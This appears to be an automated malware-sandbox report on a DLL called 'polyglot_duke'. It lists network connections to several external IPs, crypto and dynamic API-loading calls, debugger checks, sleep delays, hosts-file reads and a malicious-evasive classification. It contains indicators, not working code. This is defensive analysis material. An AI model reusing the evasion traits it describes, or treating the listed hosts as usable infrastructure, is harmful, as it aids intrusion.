Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 5.9.110.84:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.1:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.70:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.204.156:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.1:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49892 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49929 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49969 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49997 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67704578 CryptImportKey,malloc,CryptEncrypt,free,malloc,CryptDestroyKey,2_2_67704578
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67702804 lstrlenA,malloc,swprintf,free,free,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptImportKey,CryptDestroyHash,CryptVerifySignatureW,free,2_2_67702804
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67704688 CryptImportKey,malloc,CryptDecrypt,free,malloc,CryptDestroyKey,2_2_67704688
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677011E02_2_677011E0
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677054402_2_67705440
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770B3702_2_6770B370
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67702BE02_2_67702BE0
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677089EC2_2_677089EC
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677096502_2_67709650
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770DAEC2_2_6770DAEC
Source: C:\Windows\System32\rundll32.exeCode function: String function: 67701000 appears 52 times
Source: classification engineClassification label: mal64.evad.winDLL@3/6@39/8
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\767668:d32cc08
Source: unmapped_executable_of_polyglot_duke.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll,InitSvc
Source: unmapped_executable_of_polyglot_duke.dllVirustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe 'C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll'
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll,InitSvc
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll,InitSvcJump to behavior
Source: unmapped_executable_of_polyglot_duke.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677016F8 free,free,LoadLibraryA,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,2_2_677016F8
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677016F8 free,free,LoadLibraryA,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,2_2_677016F8
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 2821239Jump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 6996Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67703C7C lstrcpyW,free,lstrlenW,SHFileOperationW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,SHFileOperationW,FindNextFileW,FindClose,2_2_67703C7C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677030C4 lstrcpyW,lstrcatW,FindFirstFileW,malloc,realloc,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,2_2_677030C4
Source: rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67706F80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_67706F80
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677016F8 free,free,LoadLibraryA,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,free,LoadLibraryA,GetProcAddress,free,2_2_677016F8
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67706F80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_67706F80
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67709064 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_67709064

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 5.9.110.84 187Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.244.42.1 187Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 216.239.32.21 187Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 192.0.84.247 80Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.244.42.70 187Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.244.42.6 187Jump to behavior
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.204.156 187Jump to behavior
Source: rundll32.exe, 00000002.00000002.578869125.000001DEA8970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.578869125.000001DEA8970000.00000002.00000001.sdmpBinary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.578869125.000001DEA8970000.00000002.00000001.sdmpBinary or memory string: &Program Manager
Source: rundll32.exe, 00000002.00000002.578869125.000001DEA8970000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770CCE8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_6770CCE8
